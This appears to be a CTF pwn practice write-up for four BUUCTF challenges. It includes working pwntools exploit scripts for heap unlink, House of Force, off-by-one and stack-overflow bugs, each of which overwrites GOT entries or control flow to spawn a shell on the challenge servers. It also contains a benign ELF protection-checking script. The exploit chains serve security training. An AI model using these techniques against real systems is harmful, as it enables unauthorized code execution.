PWN-PRACTICE-BUUCTF-19
- hitcontraining_bamboobox
- picoctf_2018_shellcode
- npuctf_2020_easyheap
- cmcc_pwnme2
hitcontraining_bamboobox
unlink; reference: hitcontraining_bamboobox heap technique unlink
```python
# -*- coding:utf-8 -*-
from pwn import *

#io=process("./bamboobox")
io=remote("node4.buuoj.cn",29339)
elf=ELF("./bamboobox")
libc=ELF("./libc-2.23-16-x64.so")

def show():
    io.sendlineafter("Your choice:","1")

def add(name_len,name):
    io.sendlineafter("Your choice:","2")
    io.sendlineafter("the length of item name:",str(name_len))
    io.sendlineafter("the name of item:",name)

def edit(index,name_len,name):
    io.sendlineafter("Your choice:","3")
    io.sendlineafter("the index of item:",str(index))
    io.sendlineafter("the length of item name:",str(name_len))
    io.sendlineafter("the new name of the item:",name)

def free(index):
    io.sendlineafter("Your choice:","4")
    io.sendlineafter("the index of item:",str(index))

def exit():
    io.sendlineafter("Your choice:","5")

#gdb.attach(io)
#pause()
add(0x40,"aaaa")
add(0x80,"bbbb")
add(0x80,"cccc")
#pause()
ptr=0x00000000006020C8
fd=ptr-0x18
bk=ptr-0x10
payload=p64(0)+p64(0x40)+p64(fd)+p64(bk)
payload=payload.ljust(0x40,"A")
payload+=p64(0x40)+p64(0x90)
edit(0,len(payload),payload)
#pause()
free(1)
#pause()
atoi_got=elf.got["atoi"]
payload=p64(0)*2+p64(0x40)+p64(atoi_got)
edit(0,len(payload),payload)
#pause()
show()
io.recvuntil("0 : ")
atoi_addr=u64(io.recv(6).ljust(8,"\x00"))
print("atoi_addr=="+hex(atoi_addr))
libc_base=atoi_addr-libc.sym["atoi"]
system=libc_base+libc.sym["system"]
#pause()
edit(0,0x08,p64(system))
#pause()
io.sendlineafter("Your choice:","/bin/sh\x00")
io.interactive()
```

House of Force; reference: hitcontraining_bamboobox heap technique House of Force
```python
# -*- coding:utf-8 -*-
from pwn import *

context.log_level="debug"
io=process("./bamboobox")
#io=remote("node4.buuoj.cn",26168)
elf=ELF("./bamboobox")
libc=ELF("./libc-2.23-16-x64.so")

def show():
    io.sendlineafter("Your choice:","1")

def add(name_len,name):
    io.sendlineafter("Your choice:","2")
    io.sendlineafter("the length of item name:",str(name_len))
    io.sendlineafter("the name of item:",name)

def edit(index,name_len,name):
    io.sendlineafter("Your choice:","3")
    io.sendlineafter("the index of item:",str(index))
    io.sendlineafter("the length of item name:",str(name_len))
    io.sendlineafter("the new name of the item:",name)

def free(index):
    io.sendlineafter("Your choice:","4")
    io.sendlineafter("the index of item:",str(index))

def exit():
    io.sendlineafter("Your choice:","5")

#gdb.attach(io)
#pause()
add(0x30,"aaaa")
payload="a"*0x30+p64(0)+p64(0xffffffffffffffff)
edit(0,len(payload),payload)
#pause()
offset=0x000-0x060-0x10
add(offset,"bbbb")  # move the top chunk
#pause()
magic=0x0000000000400D49
add(0x10,p64(magic)*2)
#pause()
exit()
#pause()
io.interactive()
```

picoctf_2018_shellcode
32-bit ELF, statically compiled, with almost none of the protections enabled.
The main function contains a call eax gadget, and eax holds the start address of the input, so sending shellcode as the input is enough to get it executed.
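The first step of the write-up above is checking which protections the binary was built with. The following added example (not from the original post or from the challenge authors) is a small checksec-style triage script that does this with the standard library only: it parses the ELF header and program headers and reports NX, PIE, RELRO and a canary heuristic. The images it runs on are constructed inside the block (an ELF header followed by program headers, not loadable binaries); the function names `elf_protections` and `build_sample_elf` and the result keys are this example's own choices.

```python
import struct
import sys

# ELF constants used below (values from the ELF specification)
PT_GNU_STACK = 0x6474E551   # program header carrying the stack permission flags
PT_GNU_RELRO = 0x6474E552   # region remapped read-only after relocation
PF_X = 0x1
ET_EXEC, ET_DYN = 2, 3


def elf_protections(data: bytes) -> dict:
    """Checksec-style triage of an in-memory ELF image.

    nx     : PT_GNU_STACK present without PF_X; a missing PT_GNU_STACK is
             reported as an executable stack, the conservative reading
    pie    : e_type is ET_DYN, i.e. the image is position independent
    relro  : a PT_GNU_RELRO segment exists (partial vs. full not distinguished)
    canary : heuristic byte search for the __stack_chk_fail symbol name
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2
    end = "<" if data[5] == 1 else ">"
    if is64:
        # e_type e_machine e_version e_entry e_phoff e_shoff e_flags e_ehsize e_phentsize e_phnum
        fields = struct.unpack_from(end + "HHIQQQIHHH", data, 16)
    else:
        fields = struct.unpack_from(end + "HHIIIIIHHH", data, 16)
    e_type, e_phoff, e_phentsize, e_phnum = fields[0], fields[4], fields[8], fields[9]

    nx = False
    relro = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type = struct.unpack_from(end + "I", data, off)[0]
        # p_flags follows p_type in Elf64_Phdr but sits at offset 24 in Elf32_Phdr
        p_flags = struct.unpack_from(end + "I", data, off + (4 if is64 else 24))[0]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {
        "nx": nx,
        "pie": e_type == ET_DYN,
        "relro": relro,
        "canary": b"__stack_chk_fail" in data,
    }


def build_sample_elf(is64, e_type, stack_flags, relro, canary):
    """Constructed test image: ELF header plus program headers only.
    It is not loadable; it exists so the triage logic can be exercised offline."""
    phdrs = []
    if stack_flags is not None:
        phdrs.append((PT_GNU_STACK, stack_flags))
    if relro:
        phdrs.append((PT_GNU_RELRO, 0x4))
    if is64:
        ehsize, phentsize = 64, 56
        ident = b"\x7fELF" + bytes([2, 1, 1]) + b"\x00" * 9
        hdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 0x3E, 1, 0, ehsize, 0, 0,
                                  ehsize, phentsize, len(phdrs), 0, 0, 0)
        body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0x10) for t, f in phdrs)
    else:
        ehsize, phentsize = 52, 32
        ident = b"\x7fELF" + bytes([1, 1, 1]) + b"\x00" * 9
        hdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 0x03, 1, 0, ehsize, 0, 0,
                                  ehsize, phentsize, len(phdrs), 0, 0, 0)
        body = b"".join(struct.pack("<IIIIIIII", t, 0, 0, 0, 0, 0, f, 0x10) for t, f in phdrs)
    return hdr + body + (b"__stack_chk_fail\x00" if canary else b"")


# Constructed samples (not the real challenge binaries):
# a 32-bit non-PIE image with an RWX stack and nothing else, the profile described above
WEAK = build_sample_elf(is64=False, e_type=ET_EXEC, stack_flags=0x7, relro=False, canary=False)
# a 64-bit PIE with NX, RELRO and a canary reference
HARDENED = build_sample_elf(is64=True, e_type=ET_DYN, stack_flags=0x6, relro=True, canary=True)
# no PT_GNU_STACK at all: deliberately reported as an executable stack
NO_STACK_HDR = build_sample_elf(is64=True, e_type=ET_EXEC, stack_flags=None, relro=False, canary=False)

if __name__ == "__main__":
    # With a path argument triage a real file, otherwise report on the constructed samples.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(elf_protections(f.read()))
    else:
        for name, img in (("weak", WEAK), ("hardened", HARDENED), ("no-gnu-stack", NO_STACK_HDR)):
            print(name, elf_protections(img))
```

Run it with a path to report on a real binary; without arguments it prints the three constructed cases. The canary field is a string match on the symbol name, so treat it as a hint rather than proof, and the RELRO field only says whether a RELRO segment exists (full RELRO would additionally need DT_BIND_NOW in the dynamic section).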
npuctf_2020_easyheap
Off-by-one (obo); reference: npuctf_2020_easyheap
```python
# -*- coding:utf-8 -*-
from pwn import *

#io=process("./npuctf_2020_easyheap")
io=remote("node4.buuoj.cn",25100)
elf=ELF("./npuctf_2020_easyheap")
libc=ELF("./libc-2.27-18-x64.so")

def add(size,content):
    io.sendlineafter("Your choice :","1")
    io.sendlineafter("Size of Heap(0x10 or 0x20 only) : ",str(size))
    io.sendlineafter("Content:",content)

def edit(index,content):
    io.sendlineafter("Your choice :","2")
    io.sendlineafter("Index :",str(index))
    io.sendlineafter("Content: ",content)

def show(index):
    io.sendlineafter("Your choice :","3")
    io.sendlineafter("Index :",str(index))

def free(index):
    io.sendlineafter("Your choice :","4")
    io.sendlineafter("Index :",str(index))

def exit():
    io.sendlineafter("Your choice :","5")

#gdb.attach(io)
#pause()
add(0x18,"aaaa")  # 0
add(0x18,"bbbb")  # 1
add(0x18,"/bin/sh\x00")  # 2
#pause()
payload="a"*0x18+p64(0x41)
edit(0,payload)
#pause()
free(1)
#pause()
payload="a"*0x10+p64(0)+p64(0x21)+p64(8)+p64(elf.got["free"])
add(0x38,payload)
#pause()
show(1)
io.recvuntil("Content : ")
free_addr=u64(io.recvuntil("\n")[:-1].ljust(8,"\x00"))
print("free_addr=="+hex(free_addr))
libc_base=free_addr-libc.sym["free"]
system=libc_base+libc.sym["system"]
print("system=="+hex(system))
#pause()
edit(1,p64(system))
free(2)
#pause()
io.interactive()
```

cmcc_pwnme2
Stack overflow
```python
from pwn import *

#io=process('./cmcc_pwnme2')
io=remote('node4.buuoj.cn',29405)
elf=ELF('./cmcc_pwnme2')
gets_plt=elf.plt['gets']
string_addr=0x0804A060
exec_str=0x080485CB
io.recvuntil('Please input:\n')
payload='a'*(0x6c+4)+p32(gets_plt)+p32(exec_str)+p32(string_addr)
io.sendline(payload)
io.sendline('./flag')
io.interactive()
```